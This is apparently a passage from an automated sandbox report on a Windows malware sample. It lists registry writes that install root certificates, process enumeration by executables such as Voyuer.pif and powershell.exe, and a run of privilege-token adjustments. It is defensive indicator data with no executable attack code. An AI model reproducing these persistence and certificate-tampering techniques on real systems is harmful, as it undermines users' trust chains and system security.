Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	gagagggagagag.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	gagagggagagag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	gagagggagagag.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	RegAsm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	4363463463464363463463463.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1940	sameconcentrate.exe
1940	sameconcentrate.exe
1940	sameconcentrate.exe
2772	gagagggagagag.exe
1044	powershell.exe
3788	powershell.exe
1940	sameconcentrate.exe
3844	powershell.exe
4256	powershell.exe
3000	soft2.exe
3000	soft2.exe
2964	3321917675.exe
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	1984	4363463463464363463463463.exe
Token: SeDebugPrivilege	1940	sameconcentrate.exe
Token: SeDebugPrivilege	2772	gagagggagagag.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	1940	sameconcentrate.exe
Token: SeIncreaseQuotaPrivilege	3400	WMIC.exe
Token: SeSecurityPrivilege	3400	WMIC.exe
Token: SeTakeOwnershipPrivilege	3400	WMIC.exe
Token: SeLoadDriverPrivilege	3400	WMIC.exe
Token: SeSystemProfilePrivilege	3400	WMIC.exe
Token: SeSystemtimePrivilege	3400	WMIC.exe
Token: SeProfSingleProcessPrivilege	3400	WMIC.exe
Token: SeIncBasePriorityPrivilege	3400	WMIC.exe
Token: SeCreatePagefilePrivilege	3400	WMIC.exe
Token: SeBackupPrivilege	3400	WMIC.exe
Token: SeRestorePrivilege	3400	WMIC.exe
Token: SeShutdownPrivilege	3400	WMIC.exe
Token: SeDebugPrivilege	3400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3400	WMIC.exe
Token: SeRemoteShutdownPrivilege	3400	WMIC.exe
Token: SeUndockPrivilege	3400	WMIC.exe
Token: SeManageVolumePrivilege	3400	WMIC.exe
Token: 33	3400	WMIC.exe
Token: 34	3400	WMIC.exe
Token: 35	3400	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3400	WMIC.exe
Token: SeSecurityPrivilege	3400	WMIC.exe
Token: SeTakeOwnershipPrivilege	3400	WMIC.exe
Token: SeLoadDriverPrivilege	3400	WMIC.exe
Token: SeSystemProfilePrivilege	3400	WMIC.exe
Token: SeSystemtimePrivilege	3400	WMIC.exe
Token: SeProfSingleProcessPrivilege	3400	WMIC.exe
Token: SeIncBasePriorityPrivilege	3400	WMIC.exe
Token: SeCreatePagefilePrivilege	3400	WMIC.exe
Token: SeBackupPrivilege	3400	WMIC.exe
Token: SeRestorePrivilege	3400	WMIC.exe
Token: SeShutdownPrivilege	3400	WMIC.exe
Token: SeDebugPrivilege	3400	WMIC.exe
